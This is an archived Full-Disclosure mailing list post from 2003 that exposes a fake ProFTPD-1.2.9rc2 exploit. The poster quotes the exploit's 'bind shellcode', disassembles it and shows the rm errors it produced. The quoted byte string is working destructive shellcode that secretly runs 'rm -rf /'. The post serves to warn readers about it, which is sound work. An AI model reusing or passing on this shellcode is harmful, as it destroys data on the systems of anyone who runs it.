| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dilema at dtors.net (dilema) Subject: ProFTPD-1.2.9rc2 localhost delete Yeah umm thats some sexy shellcode there. > > /* x86 bind shellcode */ > char sc[]= > "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" > "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" > "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" > "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" > "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" > "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" > "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" > "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; 00000002 50 push eax 00000003 6866202F58 push dword 0x582f2066 00000008 686D202D72 push dword 0x722d206d 0000000D 682D635872 push dword 0x7258632d 00000012 6841414141 push dword 0x41414141 00000017 6841414141 push dword 0x41414141 0000001C 6841414141 push dword 0x41414141 00000021 6841414141 push dword 0x41414141 00000026 682F736843 push dword 0x4368732f 0000002B 682F62696E push dword 0x6e69622f 00000030 31C0 xor eax,eax 00000032 88442407 mov [esp+0x7],al 00000036 8844241A mov [esp+0x1a],al 0000003A 88442423 mov [esp+0x23],al 0000003E 89642408 mov [esp+0x8],esp 00000042 31DB xor ebx,ebx 00000044 8D5C2418 lea ebx,[esp+0x18] 00000048 895C240C mov [esp+0xc],ebx 0000004C 31DB xor ebx,ebx 0000004E 8D5C241B lea ebx,[esp+0x1b] 00000052 895C2410 mov [esp+0x10],ebx 00000056 89442414 mov [esp+0x14],eax 0000005A 31DB xor ebx,ebx 0000005C 89E3 mov ebx,esp 0000005E 8D4C2408 lea ecx,[esp+0x8] 00000062 31D2 xor edx,edx 00000064 8D542414 lea edx,[esp+0x14] 00000068 B00B mov al,0xb 0000006A CD80 int 0x80 0000006C 31DB xor ebx,ebx 0000006E 31C0 xor eax,eax 00000071 CD80 int 0x80 ## Super Seczy Shellcode ## rm: cannot remove `//bin': Permission denied rm: cannot remove `//dev': Permission denied rm: cannot remove `//etc': Permission denied rm: cannot remove `//lib': Permission denied rm: cannot remove `//mnt': Permission denied rm: cannot remove `//opt': Permission denied rm: cannot remove `//tmp': Permission denied rm: cannot remove `//sys': Permission denied rm: cannot remove `//var': Permission denied rm: cannot remove `//usr': Permission denied rm: cannot remove `//boot': Permission denied rm: cannot remove `//home': Permission denied rm: cannot remove `//proc': Permission denied rm: cannot remove `//sbin': Permission denied rm: cannot remove `//root': Permission denied rm: cannot remove `//share': Permission denied rm: cannot remove `//.bash_history': Permission denied rm: cannot remove `//.xauthKbxfnN': Permission denied rm: cannot remove `//.irssi': Permission denied -- dilema <dilema@...rs.net> -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031024/c8645670/attachment.bin
Powered by blists - more mailing lists